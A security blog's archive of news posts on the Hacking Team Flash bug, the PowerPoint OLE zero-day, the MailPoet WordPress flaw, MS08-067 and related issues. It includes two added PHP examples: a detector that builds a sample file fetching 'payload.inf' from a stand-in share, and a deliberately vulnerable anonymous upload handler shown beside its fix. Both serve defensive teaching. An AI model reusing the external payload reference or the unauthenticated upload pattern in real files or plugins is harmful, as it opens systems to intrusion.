Adobe Set To Tackle Hacking Team Flash Threat

There has been much said about the Hacking Team story over the last few days, ranging from the ethics of the company’s business through to concerned individuals who say they’ve found the software in question on their systems.

Now, though, there is another facet to the tale – a new Adobe Flash vulnerability discovered in the 400 or so gigabytes of documents leaked in the wake of the breach.

Data belonging to the Italian firm, first posted online on Sunday, suggested it knew of a serious flaw in Flash but did not communicate that fact to Adobe [our CEO, Brian Honan recently offered up some golden advice on vulnerability disclosure]. Now, fast-moving exploit kit developers have apparently taken advantage of that situation with CSO Online reporting that:

Exploit kit developers were quick to weaponize it thanks to detailed instructions provided by Hacking Team documentation.

CSO’s Steve Ragan noted that attacks have been spotted in both the Chrome and Firefox browsers.

Meanwhile, Jerome Segura from Malwarebytes described what Hacking Team called “the most beautiful Flash bug for the last four years” as:

One of the fastest documented cases of an immediate weaponisation in the wild, possibly thanks to the detailed instructions left by the Hacking Team.

Speculating as to why Hacking Team, which sells spying software to governments and their intelligence agencies around the world, may have kept the news of the vulnerability to itself, Bharat Mistry of Trend Micro said:

When you know the severity of a flaw, there’s a duty to disclose it to the software vendor.

Maybe they saw this as an avenue they could use for their own purposes and wanted to keep it under wraps.

But Flash has a big presence on the web. There is mass potential for this bug to be exploited by criminals.

Trend Micro also said there is evidence that the bug is already being exploited in active attacks, and noted that the Hacking Team code takes advantage of a trick first observed at this year’s Pwn2Own.

Commenting on the news, Ken Westin, Senior Security Analyst at Tripwire, said:

The market for zero day vulnerabilities is alive and well and as the Hacking Team breach has revealed is also highly profitable.

As many governments move to try and control malware and offensive security tools, some have been caught with their own hands in the cookie jar, leading many to wonder how and why governments and agencies listed as Hacking Team clients are using these tools and if they are doing so lawfully.

Given the depth and amount of data compromised in this breach, it will reveal a great deal about the market for offensive tools designed for espionage with a great deal of fallout and embarrassment for some organizations.

For its part, Adobe has confirmed that the vulnerability could “cause a crash and potentially allow an attacker to take control of the affected system”.

A security bulletin from the company noted how the flaw affected  Flash Player and earlier versions for Windows and Macintosh, as well as Flash Player Extended Support Release version and earlier 13.x versions for Windows and Macintosh, and Flash Player and earlier 11.x versions for Linux.

The vulnerability – identified as CVE-2015-5119 – will be patched later today, it said.

Computer Issues Ground Polish Planes But Was It A Hack?

I’ve often seen it said that flying is the safest form of travel (don’t believe it myself, damn phobia) but, according to recent events, it also appears to be the most hacked too.

Just one month on from all the hoo-ha about Chris Roberts hacking into a plane’s systems to steer the aircraft, and two months after American Airlines flights experienced significant downtime after the iPads they use for distributing flight plans crashed, we’ve now seen further flights apparently grounded by hackers.

Over the weekend, some 1,400 passengers were stranded in Warsaw after Poland’s national airline – LOT – discovered it could not log the flight plans for its departing aircraft.

That, according to Reuters, was because hackers had targeted the ground computer systems at Chopin airport.

Company spokesman Adrian Kubicki said the afternoon hack affected flights for around five hours, grounding ten of them and delaying a dozen more.

In a press release, LOT said:

This afternoon LOT encountered an IT attack that affected our ground operation systems. As a result we are not able to create flight plans, and outbound flights from Warsaw are not able to depart. We would like to underline that it has no influence on plane systems. Aircraft that are already airborne will continue their flights. Planes with flight plans already filed will return to Warsaw normally.

In a subsequent release the airline explained how it regained control of its IT systems quickly and was working to restore normal service just as fast as it could.

With further details of the claimed attack hard to come by, speculation has been rife over what really happened. Given how ‘hot’ airline hack stories are in the media right now, it is understandable that this incident would be labelled as one, but until confirmed otherwise it is just as likely to be a computer glitch, a hypothesis first put forward by ‘Information Security Pornstar’ the grugq, who said:

The story doesn’t make sense, and most of the actual info so far suggests a “glitch” caused by an unauthorized user.

Whatever the case may be, the grounding of Polish airplanes, along with iPad glitches and the confirmed hacking of inflight entertainment systems certainly should be raising some eyebrows and prompting security and staff training reviews, or so I would hope.

As our CEO Brian Honan wrote for CSO Online,

Like so many other business sectors around the world airlines are taking advantage of the benefits computer systems can bring in improving their processes, enhancing the customer experience, and reducing costs. Given the nature of their business the security of these computer systems, both in the air and on the ground, is of tantamount importance to airlines and their passengers.  The events of today in Poland and the other previous events have raised more questions than answers regarding airline security.

LOT continues to investigate the incident and says it will share what it learns with law enforcement agencies. Kubicki suggested the biggest concern was the fact that LOT’s systems were the same ones used by other airlines, meaning an attack (if that is what this is) could be equally successful against them too.

Microsoft Warns Users Over PowerPoint Zero Day, Releases Fixit

Microsoft has warned Windows users that cyber criminals are exploiting a zero-day vulnerability using malicious PowerPoint documents.

The vulnerability affects all versions of Windows except Windows Server 2003.

Microsoft has already released a Fixit tool that neuters known PowerPoint attacks but there is a risk that new attacks may yet spring up. The fix, found here, is not available for 64-bit versions of PowerPoint run on 64-bit versions of Windows 8, Windows 8.1, Windows Server 2012, or Windows Server 2012 R2.

The flaw is a remote code execution vulnerability, which means a successful attack would allow an attacker to hijack a PC after a user opens a malicious Office document, potentially opening the door to further attacks in the form of other malware being planted, or to the theft of personal or sensitive data stored on the target machine.

In the case of a successful attack, the infiltrator would gain the same privileges as the user, which could be a significant problem for those who log on as an administrator, or for those who click through the User Account Control (UAC) prompt that appears when the document is opened – Microsoft reports that a UAC prompt appears in every attack it is aware of.

A UAC prompt appearing when a document is opened is not normal, but many users may not be aware of that, which again highlights why security awareness is so important both within the business realm and among home users.

Of course it isn’t only Microsoft Office documents that pose a threat here – other file types could too, if the application that opens them supports OLE (object linking and embedding) objects.
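As an added example (not from the original post, and not the exploit itself), here is a PHP heuristic that scans an OOXML package for the two things a defender would want to flag given the above: parts stored under an embeddings folder, and OLE relationships marked TargetMode="External", which make the application fetch the object from outside the document. The two sample packages it builds are constructed for the example; the network-share target and the part names are assumptions, not copies of any real malicious file.

```php
<?php
// Added example, not from the original post: a heuristic scan of an OOXML
// package (.pptx, .docx and .xlsx are all zip files) for embedded OLE objects
// and for OLE relationships whose target lies outside the package. The sample
// packages built below are constructed for this example; their part names and
// the network-share target are assumptions, not a copy of any real exploit file.
declare(strict_types=1);

/** Inspect one .rels part and report OLE relationships that point outside the package. */
function scan_rels(string $partName, string $xml): array
{
    $findings = [];
    $doc = new DOMDocument();
    // LIBXML_NONET: never fetch anything over the network while parsing.
    if (!$doc->loadXML($xml, LIBXML_NONET | LIBXML_NOERROR | LIBXML_NOWARNING)) {
        return ["unparseable relationships part: $partName"];
    }
    foreach ($doc->getElementsByTagName('Relationship') as $rel) {
        $type   = $rel->getAttribute('Type');
        $target = $rel->getAttribute('Target');
        $mode   = $rel->getAttribute('TargetMode');
        // The OOXML relationship type for an OLE object ends in "/oleObject";
        // TargetMode="External" means the object is loaded from outside the file.
        if (str_ends_with($type, '/oleObject') && strcasecmp($mode, 'External') === 0) {
            $findings[] = "external OLE target in $partName: $target";
        }
    }
    return $findings;
}

/** Scan a whole package; returns a list of human-readable findings (empty = nothing found). */
function scan_ooxml_for_ole(string $path): array
{
    $zip = new ZipArchive();
    if ($zip->open($path) !== true) {
        throw new RuntimeException("cannot open $path as a zip archive");
    }
    $findings = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->getNameIndex($i);
        // Embedded OLE payloads are stored as parts such as ppt/embeddings/oleObject1.bin.
        if (preg_match('#/embeddings/[^/]+\.bin$#i', $name)) {
            $findings[] = "embedded OLE object: $name";
        } elseif (preg_match('#\.rels$#i', $name)) {
            $xml = $zip->getFromIndex($i);
            if ($xml !== false) {
                $findings = array_merge($findings, scan_rels($name, $xml));
            }
        }
    }
    $zip->close();
    return $findings;
}

/** Build a minimal constructed package; $malicious adds an external OLE reference. */
function build_sample_package(string $path, bool $malicious): void
{
    $zip = new ZipArchive();
    if ($zip->open($path, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) {
        throw new RuntimeException("cannot create $path");
    }
    $zip->addFromString('[Content_Types].xml',
        '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>');
    $zip->addFromString('ppt/slides/slide1.xml',
        '<?xml version="1.0"?><p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"/>');
    $rels = '<?xml version="1.0" encoding="UTF-8"?>'
        . '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        . '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout"'
        . ' Target="../slideLayouts/slideLayout1.xml"/>';
    if ($malicious) {
        // Constructed: an OLE object fetched from a UNC share instead of from inside the file.
        $rels .= '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"'
            . ' Target="file:///\\\\example-share\\drop\\payload.inf" TargetMode="External"/>';
        $zip->addFromString('ppt/embeddings/oleObject1.bin', "\xD0\xCF\x11\xE0 constructed placeholder");
    }
    $zip->addFromString('ppt/slides/_rels/slide1.xml.rels', $rels . '</Relationships>');
    $zip->close();
}

$dir = sys_get_temp_dir();
foreach (['benign' => false, 'suspect' => true] as $label => $malicious) {
    $file = "$dir/$label.pptx";
    build_sample_package($file, $malicious);
    $findings = scan_ooxml_for_ole($file);
    echo "$label.pptx: ", $findings ? implode('; ', $findings) : 'no OLE findings', "\n";
}
```

The benign package produces no findings; the suspect one reports both the embedded oleObject1.bin part and the external UNC target. This is a triage heuristic, not a verdict: legitimate documents do embed OLE objects, so the external-target case is the one worth quarantining first, and the embedded-object case is a cue to detonate the file in a sandbox rather than deliver it.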

Commenting on the news, Sagie Dulce, security research engineer at Imperva said:

“This was recently discovered by iSight. They exposed a Russian hacker group they call SandWorm.

This vulnerability was used for the initial compromise. Using social engineering, this group gained an initial foothold on machines by convincing the victim to open a PowerPoint document. The victim also had to click “allow” when opening the file, to allow malicious code to be executed.

“According to iSight: “there have been several confirmed incidents in Ukraine, Poland, Western Europe and the United States since at least 2009. NATO, the public sector and private firms in energy and telecommunications have been targeted.”

“The malware identified related to this attack is BlackEnergy. Early versions of it were used for DDoS, spam and CC theft.

Because this campaign seems to be government sponsored, the malware was probably used to download additional components after the initial exploit (and not to perform DDoS).

“Apart from the newest zero day, these attackers exploited a range of Office related exploits, dating back to 2010.”

While Mark Sparshott, EMEA director at Proofpoint highlighted how the bad guys could employ phishing techniques to get infected emails onto a target system:

“Object Linking & Embedding (OLE) is legitimately used to display parts of a file within another file, e.g. to display a chart from an Excel Spreadsheet within a PowerPoint presentation. This is not the first time that a vulnerability in OLE has been exploited by cybercriminals, however most previous OLE vulnerabilities have been limited to specific older versions of the Windows operating system. What makes this vulnerability dangerous is that it affects the latest fully patched versions of Windows.

The race is on. Cybercriminals will use phishing and longlining emails containing URL links to websites hosting malicious files that exploit this vulnerability or attach the malicious file to the email itself. While Microsoft and security vendors rush to close the security hole the best form of defence remains using the latest next generation detection technologies such as sandboxing at the email gateway to prevent the emails reaching users in the first place. Organisations not yet using advanced detection tools will need to fall back to notifying users and relying on them not to click the links and open files. Unfortunately, Proofpoint’s Human Factor Report highlighted that staff click on 1 in 10 malicious links on average, so cybercriminals will see a lot of success before the security gap on this vulnerability is closed.”

Mark James, security expert at ESET made the point that the end user would need to initiate the attack in some way, thus highlighting yet again how technology can only take security so far:

“These particular attack vectors are created from a number of opportunities: either the user must be directed to an offending website or an email containing the compromised file would need to be opened. If directed to a website then an email containing a link with a promise of a reward or benefit would arrive in your inbox, which, if clicked, would present you with, in this case, a PowerPoint show or presentation (all Microsoft Office file types as well as many other third-party file types could contain a malicious OLE object), again containing some kind of enticing properties (celebrities are often used in these cases). If you are tempted to click and open the file you could open up the possibility of being infected by further malware.

Obviously in this case, and many other similar scenarios, the end user must initiate the means to be infected. User Account Control (UAC) will help protect you in these cases and is on by default in operating systems from Vista onwards. Users should also always be mindful of emails containing links or files even from sources they trust. It’s better to delete and ask the sender to send again than to chance being infected and opening up your whole business network to malware attack. Also, wherever possible, do not use an administrator account when working with emails. These vulnerabilities take on the same access rights as the account that executed the file, if that is full admin rights then you’re in a whole world of trouble.”

Lamar Bailey, director of security research and development at Tripwire played down the threat posed by the zero day, saying:

“This is not a major issue. The vulnerability is just an escalation of privilege issue and requires a watering hole attack and/or persuading the victim to open a file to exploit.  If a user can be convinced via email, instant message, social media, or in some manner to open a PowerPoint attachment then the attacker will gain the same user rights as the current user.

If the current user has the ability to install programs or access critical systems in the environment this could be used by attackers to gain a foothold in a network and the exploited system would be used as a base of attack.

Users should know better than to open attachments from unknown sources in email or to download documents from random internet sites. A successful attack will likely spoof an email from an internal user or put a malicious file on a compromised site.”

While I agree that the issue shouldn’t be a major one for the reasons Lamar mentions, it is unfortunate that in 2014 not every user understands the need to be careful when opening emails or downloading documents, whatever their source.

Until at least a moderate appreciation of security issues is held by the population at large, such attacks will still, alas, continue to be successful for those that launch them.

MailPoet Newsletters Plugin For WordPress Vulnerable, Update Available

If you have responsibility for a corporate blog (or run your own) and it runs on WordPress and has a newsletter then I would suggest that you check how your newsletters are handled.

If you find that your blog relies upon MailPoet (a plugin that has been downloaded over 1.7 million times) then you need to be aware that a vulnerability was discovered yesterday which allows a hacker to upload just about anything to the affected site without any form of authentication being required.

Daniel Cid, CTO of Sucuri, gave the following warning in a blog post:

“If you have this plugin activated on your website, the odds are not in your favor. An attacker can exploit this vulnerability without having any privileges/accounts on the target site. This is a major threat, it means every single website using it is vulnerable.”

Sucuri researchers, who kept most of the technical details to themselves for obvious reasons, said that the vulnerability allows a potential attacker to do just about anything on his victim’s website, such as sending out spam, affecting other sites on the same shared host, acting as a lure for phishing attacks and hosting malware directly.

Cid explained that:

“The basics of the vulnerability however is something all plugin developers should be mindful of: the vulnerability resides in the fact that the developers assumed that WordPress’s “admin_init” hooks were only called when an administrator user visited a page inside /wp-admin/.

It is an easy mistake to make and they used that hook (admin_init) to verify if a specific user was allowed to upload files.

However, any call to /wp-admin/admin-post.php also executes this hook without requiring the user to be authenticated. Thus making their theme upload functionality available to everybody.”
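The hook mistake Cid describes, beside the fix, as an added example in PHP that is not MailPoet’s own code: the function names, the action name and the capability are assumptions chosen for the illustration. WordPress fires admin_init on every request to /wp-admin/admin-post.php and /wp-admin/admin-ajax.php, including requests from visitors who are not logged in at all, so a capability check hung on that hook is not a gate; the check belongs in the handler itself, together with a nonce so that a logged-in administrator cannot be tricked into submitting the request.

```php
<?php
// Added example, not MailPoet's code: the admin_init mistake Daniel Cid
// describes, beside a hardened handler. Names are made up for the illustration
// and the code assumes it is loaded as a WordPress plugin.

// --- Vulnerable pattern ---------------------------------------------------
// The author assumes admin_init only runs for an administrator inside
// /wp-admin/ and uses it as the gate for a file-upload handler. WordPress
// fires admin_init for every request to admin-post.php and admin-ajax.php,
// logged in or not, so the upload runs for anyone who posts the right field.
add_action('admin_init', 'example_vulnerable_upload');
function example_vulnerable_upload(): void
{
    if (empty($_POST['example_action']) || $_POST['example_action'] !== 'upload_theme') {
        return;
    }
    // No current_user_can(), no nonce: reachable by an anonymous POST to
    // /wp-admin/admin-post.php.
    $stored = wp_handle_upload($_FILES['theme_zip'], ['test_form' => false]);
    // ... unpack $stored['file'] into the themes directory ...
}

// --- Hardened pattern -----------------------------------------------------
// 1. Register on the hook admin-post.php dispatches for logged-in users only
//    (admin_post_{action}); logged-out requests go to admin_post_nopriv_{action},
//    which is deliberately not registered, so they reach no handler at all.
// 2. Check the capability inside the handler, not on an earlier, unrelated hook.
// 3. Verify a nonce so an administrator cannot be CSRF'd into the upload.
add_action('admin_post_example_upload_theme', 'example_hardened_upload');
function example_hardened_upload(): void
{
    if (!current_user_can('install_themes')) {
        wp_die('Insufficient permissions.', '', ['response' => 403]);
    }
    check_admin_referer('example_upload_theme'); // dies on a missing or bad nonce

    if (empty($_FILES['theme_zip']['tmp_name'])) {
        wp_die('No file uploaded.', '', ['response' => 400]);
    }
    $stored = wp_handle_upload($_FILES['theme_zip'], [
        'test_form' => false,
        'mimes'     => ['zip' => 'application/zip'], // only accept a zip archive
    ]);
    if (isset($stored['error'])) {
        wp_die(esc_html($stored['error']), '', ['response' => 400]);
    }
    // ... unpack $stored['file'] into the themes directory ...
    wp_safe_redirect(admin_url('themes.php?uploaded=1'));
    exit;
}

// The form that submits to the hardened handler carries the matching nonce.
function example_upload_form_html(): string
{
    return '<form method="post" enctype="multipart/form-data" action="'
        . esc_url(admin_url('admin-post.php')) . '">'
        . '<input type="hidden" name="action" value="example_upload_theme">'
        . wp_nonce_field('example_upload_theme', '_wpnonce', true, false)
        . '<input type="file" name="theme_zip"><button>Upload</button></form>';
}
```

With the hardened version, an anonymous POST to admin-post.php with action=example_upload_theme finds no handler, a logged-in subscriber fails current_user_can(), and an administrator whose request lacks a valid nonce is stopped by check_admin_referer(). The general rule for plugin authors is the one Cid draws: a hook tells you when code runs, never who is running it.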

Cid goes on to say that the research team shared their findings with the plugin author a few weeks ago and, to their credit, they responded well and issued a new patched version (2.6.7) yesterday. Unfortunately, however, the author makes little mention of the security issue, bar one line in the changelog, so it’s quite likely that a large number of users are not aware of the pressing need to install the latest version.

If you are using the MailPoet plugin then you should check now that you have the latest version installed.

If you don’t then you can navigate to your blog’s Dashboard.

From there, click on Plugins > Update Available and look for the MailPoet plugin. Directly underneath it you will see the option to ‘upgrade now’. Click on that and follow the instructions.

Alternatively, you can find the plugin via (click here), download the latest version and then follow the installation guide.

As ever, I would advise running a full backup of your site before making any changes such as updating core files or plugins and, if you don’t already have one, now would also be a good time to implement a regular backup schedule, just in case anything does ever go wrong in the future (WordPress is a popular target for attackers and this isn’t the first time that a noteworthy plugin has had issues lately).

List of the TOP 25 Most Dangerous Programming Errors Released

Earlier today the List of the Top 25 Most Dangerous Programming Errors was released. The list was compiled by a number of different organisations and coordinated by the SANS Institute.

Criminals are moving from attacking the infrastructure layer to finding ways into systems through bugs in the applications that sit on top of it. In light of this change in tactics it is very important that, if you are responsible for developing applications, you ensure your code does not contain any of these errors. If you are not responsible for developing applications then make sure this list gets to those who are, and that they pay heed to it.

SSL Certificates Vulnerable to Attack

The computer security community is abuzz with the news announced today by a team of security researchers at the 25th Chaos Communication Congress in Berlin. The researchers demonstrated how they were able to generate a rogue Certificate Authority certificate, allowing them to impersonate any secure website that relies on SSL certificates.

The research is very interesting and the full paper is available here. What I particularly liked is that they used a cluster of around 200 PlayStation 3 consoles to compute the MD5 collision.

However, before we all panic and think that the Internet as we know it has come to an end, we should note that the attack has a number of limitations. Firstly, the attack is against the MD5 algorithm, which has had known weaknesses since 2004, so certificates signed with other algorithms are not affected by it. Secondly, the attack relied on the targeted CA issuing certificates with sequential serial numbers, which made the contents of the certificate to be signed predictable. Finally, the researchers have kept their methods to themselves to give vendors time to address the issue.

Wired magazine has a good write up on the issue, while Rich Mogull has an excellent post on his blog as to why we should not panic with regards to this issue, as does the Security Uncorked blog.  The Errata Security Blog also highlights that not all certificates based on MD5 are vulnerable.  The SANS Internet Storm Center also has a good write up of the issue with a list of vendor statements regarding the status of their certificates.

You can also use this site to check what SSL certificates are being used by a site you are visiting.

Microsoft To Release Out Of Cycle Patch for IE Vulnerability

Microsoft has announced that it will release an out of band patch for the vulnerability in Internet Explorer as outlined in the Microsoft Security Advisory 961051.

The patch will be released on the 17th December 2008.

Microsoft will host two webcasts to address questions on the patch. The first is scheduled for 13:00 Pacific Time (US & Canada) on the 17th of December; you can register for this webcast at

The second is scheduled for 11:00 AM Pacific Time (US & Canada) on the 18th of December; you can register for this webcast at

More details on this out-of-band patch are available at

I was interviewed about this vulnerability on this evening’s Last Word Show on Today FM by Matt Cooper.  A podcast of the show is available here, my piece is about 5 minutes in from the beginning. 

I found it interesting to see how today a security vulnerability is getting press attention, whereas a few years ago it would be computer viruses.  Have we moved on to realise that the threat landscape is changing?

Microsoft Warn of New Attacks Against MS08-067

Microsoft are again urging PC users to apply the MS08-067 emergency patch issued last October, due to an increase in attacks aimed at exploiting that vulnerability. In particular a new worm, Worm:Win32/Conficker.A, has been noted as causing a rise in the number of attacks.

Once a PC is infected, Worm:Win32/Conficker.A will patch the vulnerability to prevent the PC from being exploited by another worm or attacker, and will also reset the system restore point to make it more difficult to recover the infected PC.

More details are available on the Microsoft Malware Protection Center Blog at

If you have not yet applied this patch it is strongly recommended that you do.

Microsoft Release Critical Out-Of-Band Patch

Microsoft tonight released a critical patch, MS08-067, outside their normal patch cycle.  For Microsoft to release a patch outside of their patch cycle indicates that this is a serious issue that we must pay attention to. 

I am obviously not the only one who thinks that as the Internet Storm Center‘s Infocon has turned yellow which means they are “currently tracking a significant new threat. The impact is either unknown or expected to be minor to the infrastructure. However, local impact could be significant. Users are advised to take immediate specific action to contain the impact. Example: ‘MSBlaster’ worm outbreak. “

The vulnerability could allow an attacker, without authentication, to remotely run arbitrary code using a specially crafted RPC request on Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems. This is similar in nature to how the MSBlaster worm propagated throughout the Internet, and this vulnerability could be used in the same way. Microsoft have reported that they have seen live targeted attacks on some customer systems using this vulnerability.

It is recommended that you patch your systems ASAP. However patches, be they from Microsoft or other vendors, bring with them inherent risks that we need to consider before rolling them out onto production systems. Will the patch introduce new problems as well as fixing the ones identified? Will it impact other applications and systems? If we patch we may have problems; if we don’t we may have a security breach. Not the easiest of choices for an IT or Information Security professional to have to make.

I recommend you look at the following steps to mitigate the problem:

  1. A concise and factual presentation should be made to senior management with the options to address the issue laid out clearly, together with the potential downside to each solution.
  2. Whatever solution is decided upon needs to be agreed to and signed off by senior management.
  3. An incident response team should be set up in order to (a) respond to any side effects from the selected plan of action or (b) in the event your systems are compromised in spite of the steps taken.
  4. Remember as part of the plan to ensure that all your backups have been running successfully and more importantly that you can restore them!
  5. Have key contact details for all relevant personnel in the event of a major problem with your systems, including contacts in third parties such as ISPs, partner companies, extranet contacts etc.
  6. Communicate clearly with the user population explaining why the patch is being deployed and to report any unusual behaviour.
  7. Ensure that all Anti-Virus signatures and software is up to date.
  8. Ensure all Intrusion Detection/Prevention Systems’ signatures are up to date.
  9. Consider how best to update remote PCs and laptops that may not be connected to your corporate network.
  10. Make sure your perimeter firewall is configured properly and that where possible personal firewalls are installed on desktops and more importantly on servers.

I strongly advise, as with all patches, to ensure that you test and are satisfied that the patch does not negatively impact your environment before you deploy it.  It also may be worth keeping on high alert even after deploying the patch as;

  1. Other new vulnerabilities could still be found in this feature of Windows.
  2. Not everyone will patch their systems in a timely fashion as we have seen time and time again and their compromise may impact your organisation.

More details are available from the Microsoft Security Response Center and also from the Internet Storm Center.  It is a pity that we do not have our own CERT here in Ireland to help coordinate a response to this issue and help Irish businesses better protect themselves.

Clickjack Proof Of Concept

Details of the much talked about Clickjack exploit are now available on Jeremiah Grossman’s blog, RSnake’s blog and Adobe’s website. Jeremiah and RSnake were meant to demonstrate clickjacking at a recent conference but decided not to, in order to give the vendors time to address the problem. Given that this exploit can be used to remotely use a victim’s webcam and/or microphone, the implications for stalking, industrial espionage or indeed national security highlight that the guys were right in waiting.

Jeremiah and RSnake should be commended on how they handled this issue, and credit should also go to the Adobe PSIRT for their response to the problem.